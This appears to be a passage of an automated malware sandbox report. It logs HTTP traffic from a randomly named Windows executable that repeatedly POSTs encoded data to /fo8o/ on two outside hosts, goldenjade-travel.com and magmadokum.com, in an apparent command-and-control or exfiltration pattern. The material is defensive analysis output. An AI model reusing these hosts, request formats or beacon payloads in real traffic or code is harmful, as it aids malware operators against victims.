                                                                                    1192.168.2.449738116.50.37.244803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:41:57.719249964 CET794OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 199
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d
                                                                                    Data Ascii: Sj=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
                                                                                    Dec 19, 2024 06:41:59.226922989 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Thu, 19 Dec 2024 05:41:58 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.449745116.50.37.244803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:42:00.373928070 CET814OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 219
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 63 55 32 51 74 42 4f 62 47 4e 6b 77 72 32 43 59 67 38 41 68 2b 2f 4a 67 36 67 70 45 6a 72 56 55 3d
                                                                                    Data Ascii: Sj=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPcU2QtBObGNkwr2CYg8Ah+/Jg6gpEjrVU=
                                                                                    Dec 19, 2024 06:42:01.893330097 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Thu, 19 Dec 2024 05:42:00 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449756116.50.37.244803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:42:03.085382938 CET10896OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 10299
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 31 6c 5a 52 68 6e 6e 47 47 38 30 5a 50 75 46 57 32 34 52 38 33 5a 36 75 7a 68 41 38 70 49 79 36 71 70 35 32 67 37 47 6f 59 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 48 4b 75 73 68 32 58 31 32 56 6f 59 48 76 33 4f 77 2b 5a 55 2b 78 63 32 41 71 79 6c 65 38 74 45 58 6b 41 56 2f 49 78 6b 4a 66 6b 30 51 50 51 44 61 69 4c 6c 4c 55 6a 37 41 31 6e 65 50 54 4a 73 75 48 61 37 32 65 43 66 48 68 58 7a 6f 45 72 62 4a 49 37 70 [TRUNCATED]
                                                                                    Data Ascii: Sj=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xL1lZRhnnGG80ZPuFW24R83Z6uzhA8pIy6qp52g7GoYSYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuHKush2X12VoYHv3Ow+ZU+xc2Aqyle8tEXkAV/IxkJfk0QPQDaiLlLUj7A1nePTJsuHa72eCfHhXzoErbJI7p0dZ0pvtJLPZCNBbfkZZuwld9LpKhkNEJcSFOpl0hwuQzM9OQ/06997bt03YSdIl1xfzR1paiBmgpgShwwcgWK2BHOIJ9pQzQmp/aD7JQSgbpKyX1LMz97dC3vpXT3T1LmfKc9RuG9FmNkX7rQVVFILVYi6fvP8mkfpU7Ub0LSpcQNjipOC0C/C+nZq/IVMWXhXRD53Din+vxQqiZwpVUJitjjiixIvySAQTu7i2pB2AbFWoNuRZF040YNoZpACYJlJyTbOftlZduaTAPmKC17B0A12pI4KZk94p8f7ouqcGtZpOv+7FgBiooP+OK41b6hivVy32G5UaAEsxSpFLYPJBxa1ZdR+vlj9IPg+HYBFaY3ZcsS4vBiQvd8+YEtGOTttG4kJLaib5p9RHFexGC5PDr6OwcxU/+X6wqyXE4SSRslpqvOvtYg54LeLHsKS7XiPqU35EdT52sfLN1AkWYVAqSNJ48HgNyqyX76+L+QJcUICRB5XPJiCkT4c5xhxV5sZh8T14Qm+BCAWAVGAb8okuU5+LbGl0CaMHYmni6NYZMRIBwwGzlHkVarquRdNwmCte0coo2aX+9i/xOFsUkIK3Ux/fgJ2rn0ElRR0LKiSxqU/5yT+uC1HI1lkflUrMhIcrcSKK5VXxofzw1KR7NuTOVYykvxW0Ox4 [TRUNCATED]
                                                                                    Dec 19, 2024 06:42:04.568470955 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Thu, 19 Dec 2024 05:42:03 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.449762116.50.37.244803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:42:05.749855042 CET512OUTGET /fo8o/?K8tpX=HvRPZ2CX3&Sj=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Dec 19, 2024 06:42:07.265697956 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Thu, 19 Dec 2024 05:42:06 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.44979885.159.66.93803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:42:21.440001011 CET773OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 199
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 6b 37 45 61 72 56 62 45 53 75 75 52 42 67 2b 62 76 78 5a 38 35 44 44 61 79 53 41 48 58 4c 67 73 77 3d 3d
                                                                                    Data Ascii: Sj=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0k7EarVbESuuRBg+bvxZ85DDaySAHXLgsw==


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.44980485.159.66.93803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:42:24.093766928 CET793OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 219
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6e 77 48 31 62 30 4b 55 32 70 33 31 34 55 71 54 73 4a 79 47 36 4e 68 6e 69 4b 2b 6f 68 44 4d 49 4d 3d
                                                                                    Data Ascii: Sj=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5nwH1b0KU2p314UqTsJyG6NhniK+ohDMIM=


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.44981585.159.66.93803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:42:26.750750065 CET10875OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 10299
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 71 51 6d 74 4c 43 70 54 55 37 78 4b 47 4b 50 33 48 63 71 76 79 6b 54 69 45 69 48 36 46 44 46 6a 35 4a 63 61 73 72 2b 54 30 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 44 5a 75 4f 51 38 58 64 55 44 58 39 61 68 67 42 65 42 73 6a 38 6e 71 74 68 2f 73 6b 63 71 73 4c 75 51 2b 31 6d 4f 73 39 4a 51 4a 4e 66 55 41 36 4d 68 73 32 39 78 6c 73 68 64 74 75 6f 47 7a 73 6d 58 51 75 70 6d 64 53 4f 2f 6f 47 54 33 56 67 64 32 33 32 [TRUNCATED]
                                                                                    Data Ascii: Sj=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMaqQmtLCpTU7xKGKP3HcqvykTiEiH6FDFj5Jcasr+T0YwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KMDZuOQ8XdUDX9ahgBeBsj8nqth/skcqsLuQ+1mOs9JQJNfUA6Mhs29xlshdtuoGzsmXQupmdSO/oGT3Vgd2324a91k53tI0Jws9/rVsbP3tlS+hge466nemxKhCLoFSjUjve6J7CjcLk7CFwGpXz+l3cB7friBjuR5Zuy3du3b5vDDVuXEvyLtum9Es/4byXUgFcim6jhKS68fuBAb47Mmsz7dA6jsQTzKMUjGSoJdqV3EzZyCggY0Bh4iPiGAL3NldetnUQVL1Yjr4GYrd7XU6TDj35BzBTEYpMolA5ZCcT4SWFA+bUtmDJlg30J55XkZSmCbX/qwbKM9Ka3+Tj/fgA+CRtRd/gpkHDrHTYGV8DkPdFiQFphPsb/FQ2S01B9N4/U0wPnJa2KS/+NUJwcmEDWFod/UQ1ELvm0gWWXefqzZHNV2caLnfrPufUZ0QkAEwkca/x02C50CIJi85NeItp2if3s2ZW0DGDO6oFier+nhjfA6mRuoue9nqL80pZwh+2SvcEPDIpTOX9Qmo4DfC+GxeMxoEVI26LQf43JpeSoIFqGOSe/2pX3pW0KFN8k/ZwesIb1LpAuRxDE4pdXGAuUuHfs9ixlfN9YpWSzabXEqJUVTJ+CsUb2SRay3eaJPw51205OfbfzEr+yDbNQuHYeYtlEw9B+fGz7kDEnk7C9ElJC5kAHGhuhCBKHHyQhFMehTadkXcDDEgIRZeaF+VaKnQwNxi2spf1vuWNMkale/2RQ8EiUZt [TRUNCATED]


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
